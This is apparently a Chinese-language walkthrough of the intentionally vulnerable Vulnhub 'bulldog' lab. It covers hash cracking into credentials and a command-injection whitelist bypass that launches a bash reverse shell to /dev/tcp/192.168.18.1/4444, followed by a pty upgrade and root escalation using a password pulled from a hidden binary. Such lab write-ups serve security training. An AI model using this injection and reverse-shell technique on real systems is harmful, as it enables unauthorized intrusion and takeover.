Vulnhub靶場滲透練習(三) bulldog

拿到靶場後先對ip進行掃描

獲取ip  和端口

針對項目路徑爆破

獲取兩個有用文件 

http://192.168.18.144/dev/

dev,admin  

更具dev 發現他們用到框架和語言 找到一個 shell 鏈接

http://192.168.18.144/dev/shell/    

反健源碼 查看能夠看到

丟入md5 網站解密 成功的解密2個用戶

Back End: nick@bulldogindustries.com

用戶名：nick，密碼：bulldog （CMD5可免費解密出來）

Database: sarah@bulldogindustries.com

用戶名：sarah，密碼：bulldoglover （SOMD5可免費解密出來）

後臺登陸在訪問 shell 操做地址 發現能夠訪問 獲得一個命令控制檯

有白名單限制

 

 這裏想到是 && 和 ||

嘗試執行

發現能夠   這時候直接反彈shell

ls &&echo "bash -i >& /dev/tcp/192.168.18.1/4444 0>&1" | bash

反彈成功 輸入python -c 'import pty;pty.spawn("/bin/bash")'  

在對歷史操做記錄查看和文件配置後並未發現有用信息  卡了好久 去看了 wp 才發現 root 密碼要拆解

對 passwd 查出的用戶進行 home 文件尋找信息

find / -user bulldogadmin    find / -user bulldogadmin django

(1) 發現值得關注的文件有：一個是note，一個是customPermissionApp。

/home/bulldogadmin/.hiddenadmindirectory/note

/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp

(2) 打開note文本文件：發現提示webserver有時須要root權限訪問。

(3) 打開customPermissionApp，看上去是可執行文件，使用strings打印其中的可打印字符：

這裏獲得的字符太多了  又卡住了  查看其餘人寫的wp 發現

，英文單詞包括：SUPER、 ulitimate、PASSWORD、

youCANTget，這些都與最高權限帳號相關  去掉h

變成一句通順的英文句子：SUPERultimatePASSWORDyouCANTget

直接執行 su  切換root 用戶

django@bulldog:/home/django/bulldog$ sudo su -
sudo su -
[sudo] password for django: bulldog

Sorry, try again.
[sudo] password for django: SUPERultimatePASSWORDyouCANTget

尬尷 雖然進去了 可是那個root 密碼拼接的是真想不出來